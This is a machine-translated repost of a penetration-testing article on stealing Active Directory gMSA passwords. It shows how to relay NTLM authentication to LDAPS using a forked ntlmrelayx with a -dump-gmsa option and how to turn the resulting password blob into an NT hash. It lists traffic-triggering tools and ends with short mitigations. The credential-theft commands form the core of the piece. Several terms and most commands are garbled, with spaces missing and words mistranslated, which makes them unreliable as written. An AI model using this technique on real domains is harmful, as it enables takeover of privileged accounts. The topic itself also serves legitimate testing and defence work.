Shulou(Shulou.com)05/31 Report--

This article is to share with you about what gMSA is. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Overview

GMSA, the English full name is "Group Managed Service Accounts", that is, the group hosting service account in the active Directory AD. GMSA accounts store their passwords in a LDAP property called "msDS-ManagedPassword". DC automatically resets this value every 30 days, and these passwords can be retrieved by authorized administrators and the servers on which they are installed. MsDS-ManagedPassword is an encrypted block called "MSDS-MANAGEDPASSWORD_BLOB" and can be retrieved only if the connection is secure (LDAPS or authentication type is' Sealing&Secure').

Before that, I personally didn't know much about gMSA, but after watching the "Bloodhound 3.0" webinar hosted by Wald0 and CptJesus, I got a new understanding of gMSA, which focused on why gMSA should be the focus of penetration testing.

After analysis, we learned that, in general, in addition to authorizing administrators, more user accounts may be granted permission to read gMSA passwords on the target device, while gMSA accounts are usually granted administrator privileges, and sometimes even domain administrative rights.

So how should we take advantage of this security problem? How can we collect the passwords of those privileged accounts?

Because there are a lot of technologies in the community that can help us generate incoming NTLM authentication connections, and this type of authentication password is stored in a LDAP attribute. I think the best solution is to retrieve the password from the LDAP property msDS-ManagedPassword in ntlmrelayx.

Relay link to LDAP

To achieve a connection to LDAP through a NTLM relay, we must ensure that the authenticated connection of the trunk uses the HTTP protocol. Due to the signature data bits required for the connection, we cannot relay the SMB authenticated connection, but the vulnerability CVE-2019-1040 can help us bypass the NTLM signature protection mechanism so that we can relay SMB- > LDAP.

The NTLM relay process is as follows:

1. The target sends an NTLM_NEGOTIATE packet to the attacker

2. Next, the attacker relays the NTLM_NEGOTIATE packet to the selected target server

3. The target server sends a reply message to the attacker, which contains a NTLM_CHALLENGE packet

4. The attacker relays the NTLM_CHALLENGE packet to the target

5. The target sends a reply message to the attacker, which contains a NTLM_AUTHENTICATE packet

6. The attacker relays the NTLM_AUTHENTICATE packet to the target server

7. The attacker will now successfully establish an authenticated session connection with the target server

Unfortunately, I did not successfully implement "Sealing & Secure" authentication in ntlmrelayx. Now we have to relay to LDAPS, and LDAPS is just a LDAP implemented through SSL, which is not configured by default for the active Directory AD installation, because there is no default available certificate.

Configure gMSA# Create a KDS RootKey on DCAdd-KdsRootKey-EffectiveTime (Get-Date) .AddHours (- 10) # Create a new gMSA on DCNew-ADServiceAccount-Name svc_msa-DNSHostName dc.htb.local-ManagedPasswordIntervalInDays 30-PrincipalsAllowedToRetrieveManagedPassword msa_read,dc$#Install gMSA on the target serverInstall-WindowsFeature AD-DOMAIN-SERVICESInstall-AdServiceAccount svc_msa exploit

First, we must generate NTLM authentication requests for relay, which we can do in the following ways, such as:

1. ADIDNS wildcard record

2 、 Responder

3. WPAD + Mitm6

4. Use a vulnerable server to create a HTTP authentication request

Next, use the following command to clone my code base to your local host, install impacket, open ntlmrelayx, and choose the method you like to generate NTLM authentication traffic (this article does not describe too much about how to generate NTLM authentication traffic):

Git clone https://github.com/cube0x0/impacketcd impacketpython setup.py installpython. / examples/ntlmrelayx.py-dump-gmsa-no-dump-no-da-no-acl-no-validate-privs-debug-t ldaps://10.0.0.5

Then, the data blocks are converted using the DSInternals module, and since the passwords are stored in random Unicode characters, we also need to convert the plaintext passwords to the ringing * format:

(ConvertFrom-ADManagedPasswordBlob) .SecureCurrentPassword | ConvertTo-NTHash

Mitigation scheme

NTLM-to-LDAP and LDAPS relay attacks can be prevented by enabling LDAP signing and LDAP channel binding. In addition, do not provide service account privileges or special privileges to redundant accounts, and every organization should follow the best practices of the least privileged model.

Thank you for reading! This is the end of this article on "what is gMSA?". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.